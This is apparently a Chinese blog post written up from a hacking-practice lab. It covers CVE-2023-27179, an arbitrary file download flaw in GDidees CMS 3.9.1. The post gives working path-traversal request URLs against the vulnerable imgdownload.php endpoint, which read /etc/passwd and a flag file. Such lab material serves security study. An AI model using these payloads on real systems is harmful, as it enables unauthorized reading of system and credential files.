归档 分类 标签 关于 RSS
- 目录 -
    • Description
    • 演示
      • 1.验证
      • 2.利用
白帽谷哥
白帽谷哥
🧨🚀🪐🌌
CVE-2023-27179
2024-07-25 label 春秋云镜   CVE   LFI  

https://nvd.nist.gov/vuln/detail/CVE-2023-27179

Description

GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.

演示

环境: 春秋云镜 免费空间>CVE-2023-27179

1.验证

https://eci-2ze1yk1jnhh0vbk5ueiq.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../etc/passwd

2.利用

https://eci-2ze1yk1jnhh0vbk5ueiq.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../flag

https://eci-2ze1yk1jnhh0vbk5ueiq.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=file:///flag


下回
CVE-2022-32991
上回
CVE-2018-16283
白帽谷哥
🧨🚀🪐🌌
归档 分类 标签 关于 RSS

京ICP备2025131704号-1

© 本站内容解释权归网站所有者所有
- 目录 -
    • Description
    • 演示
      • 1.验证
      • 2.利用
keyboard_arrow_up dark_mode
© 本站内容解释权归网站所有者所有